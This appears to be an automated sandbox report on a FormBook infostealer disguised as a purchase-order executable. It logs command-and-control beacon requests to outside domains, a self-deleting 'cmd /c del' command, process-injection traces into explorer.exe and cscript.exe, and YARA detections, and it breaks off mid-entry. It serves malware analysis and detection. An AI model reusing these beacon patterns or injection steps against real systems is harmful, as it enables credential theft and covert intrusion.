                                                                          Host: www.owletbaby.shop
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 8, 2024 10:05:48.007040024 CEST | 344 | IN | HTTP/1.1 200 OK
                                                                          Server: openresty
                                                                          Date: Mon, 08 Apr 2024 08:05:47 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 204
                                                                          Connection: close
                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?YN9P-lUP=om+RAj9K10xplgkf4U8b3M9JRGUJ2euP6f07OPQVfzk2A/ET/uqRAGThuSpikjnaupQL&Vr=L4nHMf5x"}</script></head></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          6 | 192.168.2.4 | 49749 | 45.76.63.192 | 80 | 2580 | C:\Windows\explorer.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Apr 8, 2024 10:06:29.007960081 CEST | 171 | OUT | GET /vr01/?YN9P-lUP=9c9cKs9OosrhOa63FDxOZSQTlUYWLUzvl6rD164QiuJtlecCGMWXkWvi90D7WwOzyhmU&Vr=L4nHMf5x HTTP/1.1
                                                                          Host: www.studioenginedemo.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 8, 2024 10:06:29.144575119 CEST | 453 | IN | HTTP/1.1 301 Moved Permanently
                                                                          Server: nginx
                                                                          Date: Mon, 08 Apr 2024 08:06:29 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 162
                                                                          Connection: close
                                                                          Location: https://www.studioenginedemo.com/vr01/?YN9P-lUP=9c9cKs9OosrhOa63FDxOZSQTlUYWLUzvl6rD164QiuJtlecCGMWXkWvi90D7WwOzyhmU&Vr=L4nHMf5x
                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          7 | 192.168.2.4 | 49750 | 66.147.240.91 | 80 | 2580 | C:\Windows\explorer.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Apr 8, 2024 10:06:49.944631100 CEST | 164 | OUT | GET /vr01/?Vr=L4nHMf5x&YN9P-lUP=wFZ5enEBtK4n2aaiRnhfStMJiblJh5bHmGRWjDpakqkf/10aPf5zMfbio25A5myUwmpi HTTP/1.1
                                                                          Host: www.oregonjobs.co
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 8, 2024 10:06:50.147938967 CEST | 479 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Mon, 08 Apr 2024 08:06:50 GMT
                                                                          Server: Apache
                                                                          Content-Length: 315
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                          Target ID:0
                                                                          Start time:10:02:45
                                                                          Start date:08/04/2024
                                                                          Path:C:\Users\user\Desktop\Purchase Order#23113.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\Purchase Order#23113.exe"
                                                                          Imagebase:0xc60000
                                                                          File size:651'272 bytes
                                                                          MD5 hash:FA3E92F061246F3B1625E6F8B8291836
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1771916843.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1771916843.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1771916843.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1771916843.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1771916843.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:2
                                                                          Start time:10:02:48
                                                                          Start date:08/04/2024
                                                                          Path:C:\Users\user\Desktop\Purchase Order#23113.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\Purchase Order#23113.exe"
                                                                          Imagebase:0xbf0000
                                                                          File size:651'272 bytes
                                                                          MD5 hash:FA3E92F061246F3B1625E6F8B8291836
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:3
                                                                          Start time:10:02:48
                                                                          Start date:08/04/2024
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                          Imagebase:0x7ff72b770000
                                                                          File size:5'141'208 bytes
                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000003.00000002.4209826259.000000000E656000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Target ID:4
                                                                          Start time:10:02:50
                                                                          Start date:08/04/2024
                                                                          Path:C:\Windows\SysWOW64\cscript.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\SysWOW64\cscript.exe"
                                                                          Imagebase:0x700000
                                                                          File size:144'896 bytes
                                                                          MD5 hash:CB601B41D4C8074BE8A84AED564A94DC
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4200202747.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4200202747.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4200202747.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4200202747.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4200202747.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4200153899.0000000004C10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4200153899.0000000004C10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4200153899.0000000004C10000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4200153899.0000000004C10000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4200153899.0000000004C10000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:moderate
                                                                          Has exited:false

                                                                          Target ID:5
                                                                          Start time:10:02:53
                                                                          Start date:08/04/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:/c del "C:\Users\user\Desktop\Purchase Order#23113.exe"
                                                                          Imagebase:0x240000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:6
                                                                          Start time:10:02:53
                                                                          Start date:08/04/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                            Execution Graph

                                                                            Execution Coverage:10.3%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:143
                                                                            Total number of Limit Nodes:4

                                                                            Control-flow Graph

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $^q$$^q$$^q$$^q$?7s$?7s
                                                                            • API String ID: 0-2840173270
                                                                            • Opcode ID: 2b13d9dec4cd6d3cf3e624457e8fe45a83c20ad2935e8709ccfaf1dd72fd8d04
                                                                            • Instruction ID: 4f8ada04f51012bb4c4a9850ae296cb4dc3ade9b0b9648ce0012e1e56d020783
                                                                            • Opcode Fuzzy Hash: 2b13d9dec4cd6d3cf3e624457e8fe45a83c20ad2935e8709ccfaf1dd72fd8d04
                                                                            • Instruction Fuzzy Hash: E1221774E14219CFDB64CFA9D984B9DBBB6BB88300F1095AAD40AB7354DB346981CF14
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $^q$$^q$?7s
                                                                            • API String ID: 0-2077139018
                                                                            • Opcode ID: ecb6c628e30d770fc581d5b4fc0e50abc61cc451f2decad8a2af845c1eac6cdd
                                                                            • Instruction ID: 1a483d7d4aea5b069c1840c922a5b723127b3ba2ec1f1c95cd1b1ab0d6045802
                                                                            • Opcode Fuzzy Hash: ecb6c628e30d770fc581d5b4fc0e50abc61cc451f2decad8a2af845c1eac6cdd
                                                                            • Instruction Fuzzy Hash: 2A221574E14219CFDB64CFA9D985B9DBBB2FB88300F10D5AAD40AA7354DB34A981CF14
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $^q$$^q
                                                                            • API String ID: 0-355816377
                                                                            • Opcode ID: d90033c0010514e09300528d8a6f4868a40e0072c36004c7d8a0ad70ec437da3
                                                                            • Instruction ID: ba78893002d7168b36d301bf5b032588920e5240038c458ddf1bd9430c459c07
                                                                            • Opcode Fuzzy Hash: d90033c0010514e09300528d8a6f4868a40e0072c36004c7d8a0ad70ec437da3
                                                                            • Instruction Fuzzy Hash: 5CB1F774E10219CFDB64CFA5C944BADBBB6FB88300F2095AAD409A7358DB346D85CF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $^q$$^q
                                                                            • API String ID: 0-355816377
                                                                            • Opcode ID: 19c00c1b6927cfcd55e7067bdfacbbf6f23f336ce53568fdd345d7cf0be144b5
                                                                            • Instruction ID: 067ae97d8b7c03ec2ddb86566819d3179d5504cdcd8ebb342cbbeb4c6088cea3
                                                                            • Opcode Fuzzy Hash: 19c00c1b6927cfcd55e7067bdfacbbf6f23f336ce53568fdd345d7cf0be144b5
                                                                            • Instruction Fuzzy Hash: 72B1E774E10219CFDB64CFA9D944BADBBB6FB88300F2085AAD409A7358DB346D85CF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $^q$$^q
                                                                            • API String ID: 0-355816377
                                                                            • Opcode ID: a1eacc2d97fa9b73bb8e34e3287a0d3eaa6ef24acc6ed2d5c0d1e2ba93d31cd4
                                                                            • Instruction ID: a136f4789c931b1a05302aa4c040ac2a19d6e11289a1129775fe2cf3fe5497f6
                                                                            • Opcode Fuzzy Hash: a1eacc2d97fa9b73bb8e34e3287a0d3eaa6ef24acc6ed2d5c0d1e2ba93d31cd4
                                                                            • Instruction Fuzzy Hash: 75A1B574E10219CFDB64CFA5D948B9DBBB6BF88300F1085AAD80AA7358DB346D85CF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dea2db7dc24f68184993e98726ab4d9cd0aa851d643ed542c9fc55c8eefc8b71
                                                                            • Instruction ID: 4511cc4dc913032f7a05ef9bfa4f857323484ae066678d5a0c2228bb4774ba3f
                                                                            • Opcode Fuzzy Hash: dea2db7dc24f68184993e98726ab4d9cd0aa851d643ed542c9fc55c8eefc8b71
                                                                            • Instruction Fuzzy Hash: B432BEB4B012059FDB29DB7AC950BAEB7F6AF89300F68846DD4059B7A1DB34EC01CB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 84c6eddee06a6bbb06fd82d87ec73ff0e39695055c144277599a058eeefdab5d
                                                                            • Instruction ID: ad31177684735feedbb4ac819ca0d93b7df52d419e7adab6d307d0e544ec22f2
                                                                            • Opcode Fuzzy Hash: 84c6eddee06a6bbb06fd82d87ec73ff0e39695055c144277599a058eeefdab5d
                                                                            • Instruction Fuzzy Hash: 5B81E375D05209DFDF08CFA6D4849AEFFB2EB89310F10D46AE416AB224DB34A941CF44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f0f738d7ec9d9a8e17e65e4bdc3a14548e5a4f4a2e53337bc25aefd4f1abaf5f
                                                                            • Instruction ID: e665eccd4eef21339c8d9b4882b386bbb9ba4d88bb4c3482f6eb851f0d0d92f2
                                                                            • Opcode Fuzzy Hash: f0f738d7ec9d9a8e17e65e4bdc3a14548e5a4f4a2e53337bc25aefd4f1abaf5f
                                                                            • Instruction Fuzzy Hash: 5381F575D05209DFDF08CFA5D4849AEFFB2EF89310F10D46AE456AB264DB34A9418F44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32 ref: 0142D0BE
                                                                            • GetCurrentThread.KERNEL32 ref: 0142D0FB
                                                                            • GetCurrentProcess.KERNEL32 ref: 0142D138
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0142D191
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1769980346.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1420000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: Current$ProcessThread
                                                                            • String ID:
                                                                            • API String ID: 2063062207-0
                                                                            • Opcode ID: 32775c8bb6adf5e03a40016813c2a8478edb06cc1649875b60e79b06b79c805f
                                                                            • Instruction ID: a18a191abdcf623145c09ec1a1ceecead8d080c3348e6af4e2c696eff593e6bb
                                                                            • Opcode Fuzzy Hash: 32775c8bb6adf5e03a40016813c2a8478edb06cc1649875b60e79b06b79c805f
                                                                            • Instruction Fuzzy Hash: FD5166B09042498FDB18CFA9D548BEEBFF1BF48318F24846AD059A7360C7349885CB66
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32 ref: 0142D0BE
                                                                            • GetCurrentThread.KERNEL32 ref: 0142D0FB
                                                                            • GetCurrentProcess.KERNEL32 ref: 0142D138
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0142D191
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1769980346.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1420000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: Current$ProcessThread
                                                                            • String ID:
                                                                            • API String ID: 2063062207-0
                                                                            • Opcode ID: 7a88504fa63295e305ce4fde71511ad1bfd9f2b86efaab52b7934b10d062eada
                                                                            • Instruction ID: 6fc7e3f3c097a3d81747313e7c5400d18ad24a9481c8f6144ccd1979ffeb6653
                                                                            • Opcode Fuzzy Hash: 7a88504fa63295e305ce4fde71511ad1bfd9f2b86efaab52b7934b10d062eada
                                                                            • Instruction Fuzzy Hash: 4C5135B09002098FDB14DFA9D548BEEBBF1BF48314F20C42AE519A7364D734A984CB65
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ~Q`j$c!
                                                                            • API String ID: 0-956487369
                                                                            • Opcode ID: 1a56cad3948e5abd4abd1b591555084b256f5ae99c3337f0daa410e4897150d6
                                                                            • Instruction ID: 24b9cb16e421ebb1ae71b9f25974881f54f2e9787c6881bb98cff38a9230ab08
                                                                            • Opcode Fuzzy Hash: 1a56cad3948e5abd4abd1b591555084b256f5ae99c3337f0daa410e4897150d6
                                                                            • Instruction Fuzzy Hash: E91142B4E15109DBCB44CFA9C54159DBBF2FB84204F10D5A5D405A3350EB74AB40CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ~Q`j$c!
                                                                            • API String ID: 0-956487369
                                                                            • Opcode ID: 56608ca8df6e2832bc667fea0551962a46ce45e3be0c0e354a35cc63f3ad02b0
                                                                            • Instruction ID: ee7140cfe85b415f85172316fd527e213a4bb722f4de27bfe24c2bfdd27e2e64
                                                                            • Opcode Fuzzy Hash: 56608ca8df6e2832bc667fea0551962a46ce45e3be0c0e354a35cc63f3ad02b0
                                                                            • Instruction Fuzzy Hash: 34116D74E15209DBCB04CFA8C98169DBBF2FB85214F24C6AAD415A3350DB34AB41CB44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07FB72BE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: CreateProcess
                                                                            • String ID:
                                                                            • API String ID: 963392458-0
                                                                            • Opcode ID: 64000b4e529a4c23d5b81e894c3f7aa2c99f3c497c4ae85c81ba1ff43713bfd8
                                                                            • Instruction ID: add4173c8d4aa02ac0415c008caa0f15a9eb313ec8aabe6d8e6c916935967ca0
                                                                            • Opcode Fuzzy Hash: 64000b4e529a4c23d5b81e894c3f7aa2c99f3c497c4ae85c81ba1ff43713bfd8
                                                                            • Instruction Fuzzy Hash: 31A151B1D0021ACFDB24DF69C841BDDBBF2BF84314F1885AAD849A7250D7749985CFA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07FB72BE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: CreateProcess
                                                                            • String ID:
                                                                            • API String ID: 963392458-0
                                                                            • Opcode ID: cb0cec207c09672643ea814e6d6e28c5ddd19cc26d9d617ad7f3b8894fd6473c
                                                                            • Instruction ID: d1cf1f362af9301141a15c6a9478c06ce7a19c93f69d4f3e05e5fde8b3e89c17
                                                                            • Opcode Fuzzy Hash: cb0cec207c09672643ea814e6d6e28c5ddd19cc26d9d617ad7f3b8894fd6473c
                                                                            • Instruction Fuzzy Hash: 5D915FB1D0021ADFDB24DF69C841BDDBBF2BF84314F1885AAE809A7250D7749985CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0142AFFE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1769980346.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1420000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: fcd1cb8358ffe5756ed2e57eb98571ac585f0e587beaa0104b1b9c14b9f60272
                                                                            • Instruction ID: c53db94dc51041e486ac31942cb7569e0de6343a0066fa00a88320b6f058c9d7
                                                                            • Opcode Fuzzy Hash: fcd1cb8358ffe5756ed2e57eb98571ac585f0e587beaa0104b1b9c14b9f60272
                                                                            • Instruction Fuzzy Hash: 13814670A00B158FD724DF6AC44479ABBF1FF48214F10892ED986D7B60D775E88ACB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 014259C9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1769980346.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1420000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 88d5691d8e6bcc34c3de89e806e23579017f8acd6e1553c07023c247edf7ded0
                                                                            • Instruction ID: dffcb1680c1f4e847e9cd79754ff0810275ed72cf42c2adcce0a7353073b4234
                                                                            • Opcode Fuzzy Hash: 88d5691d8e6bcc34c3de89e806e23579017f8acd6e1553c07023c247edf7ded0
                                                                            • Instruction Fuzzy Hash: E441F4B0D00729CFDB24DFA9C884BCEBBB5BF49304F60815AD408AB265DB756985CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 014259C9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1769980346.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1420000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 55a1aecc936b31622b27f629fb7e7930b6b43250f8449f08be366a30a9a092a2
                                                                            • Instruction ID: 4333a6a7a2f893f959b7153f9826f9c7deff32b78ee255972ce9604b29a928b3
                                                                            • Opcode Fuzzy Hash: 55a1aecc936b31622b27f629fb7e7930b6b43250f8449f08be366a30a9a092a2
                                                                            • Instruction Fuzzy Hash: B141F4B0D00729CBDB24CFA9C844BDEBBB5BF49304F60816AD408AB265DB755985CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07FB6E90
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
